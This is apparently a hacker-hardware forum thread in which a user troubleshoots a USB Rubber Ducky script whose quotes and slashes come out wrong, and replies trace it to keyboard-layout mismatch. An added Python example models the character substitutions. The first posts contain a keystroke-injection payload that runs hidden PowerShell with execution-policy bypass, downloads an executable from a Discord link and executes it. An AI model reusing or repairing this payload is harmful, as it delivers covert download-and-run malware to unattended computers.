Payload powershell wget execute


Hello, I'm a newb to the USB Rubber Ducky. I received mine 4 days ago for pen testing, and I have a small problem with the STRING code.

Here is the code I used below.

DELAY 200
CONTROL ESCAPE
DELAY 300
STRING run
DELAY 100
ENTER
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""
ENTER

 

When executed in notepad.exe, I get this code with a lot of @ and #

 

powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What am I doing wrong? Can someone help?

 

 

 


It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout?


I own a Corsair K70 keyboard.

Everything looks good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing: the USB Rubber Ducky does not recognize this key

---> "
The Ducky replaces it with this key ---> \

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\

After the execution, the code is missing a lot of "

The Ducky must press Shift and the key surrounded in red, but it presses Shift + \, the key to the left of the 1 key.

12345.PNG
 

Original code
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""




 

Edited by myapple851

So, even if something is still not correct, something has changed between your first and last post; @ has become \, what did you change? Forward slashes / also seem to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screenshot. Your physical keyboard doesn't matter, btw. I used the chars that give you problems with other keyboard layouts and I have no problems running my payloads that contain those chars. Perhaps the ca-fr.json language map file isn't all correct?

Edited by chrizree
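
The layout point raised in this thread, as an added example that is not part of any post: an injected keystroke is a modifier byte plus a HID usage ID, and the host converts it to a character using its own active layout, not the one the encoder assumed. The two layout tables are constructed fragments (an assumption based on the standard US and Canadian French layouts, limited to a few characters), and the sample line is constructed. With a Canadian French encoding read by a US-layout host, the model gives the same `"` to `@`, `/` to `#` and `'` to `<` substitutions that appear in the first post's output.

```python
import string

SHIFT = 0x02  # Left Shift bit of the HID modifier byte
# Usage IDs from the USB HID keyboard usage page for the keys involved.
KEY_2, KEY_3, KEY_SPACE, KEY_APOS, KEY_COMMA, KEY_SLASH = 0x1F, 0x20, 0x2C, 0x34, 0x36, 0x38

def base_layout():
    """Keys that sit in the same place on both layouts: a-z, A-Z, space."""
    m = {" ": (0, KEY_SPACE)}
    for i, c in enumerate(string.ascii_lowercase):
        m[c] = (0, 0x04 + i)              # usage IDs 0x04..0x1D are A..Z
        m[c.upper()] = (SHIFT, 0x04 + i)
    return m

# Constructed layout fragments (assumption): only the characters at issue here.
US = {**base_layout(), '"': (SHIFT, KEY_APOS), "'": (0, KEY_APOS), "/": (0, KEY_SLASH),
      "@": (SHIFT, KEY_2), "#": (SHIFT, KEY_3), "<": (SHIFT, KEY_COMMA)}
CA_FR = {**base_layout(), '"': (SHIFT, KEY_2), "/": (SHIFT, KEY_3), "'": (SHIFT, KEY_COMMA)}

def encode(text, layout):
    """Encoder side: turn characters into (modifier, usage ID) reports."""
    return [layout[ch] for ch in text]

def decode(reports, layout):
    """Host side: look each report up in the host's own active layout."""
    inverse = {report: ch for ch, report in layout.items()}
    return "".join(inverse.get(r, "\N{REPLACEMENT CHARACTER}") for r in reports)

def mismatches(text, encoder_layout, host_layout):
    """Map each character that arrives changed to what the host typed instead."""
    typed = decode(encode(text, encoder_layout), host_layout)
    return {sent: got for sent, got in zip(text, typed) if sent != got}

if __name__ == "__main__":
    sample = "say \"a/b\" 'c'"            # constructed sample line
    print(decode(encode(sample, CA_FR), US))
    print(mismatches(sample, CA_FR, US))
```

Typing a short test line into a text editor and comparing it with the source, as done in the first post, yields the same kind of substitution table for a real target.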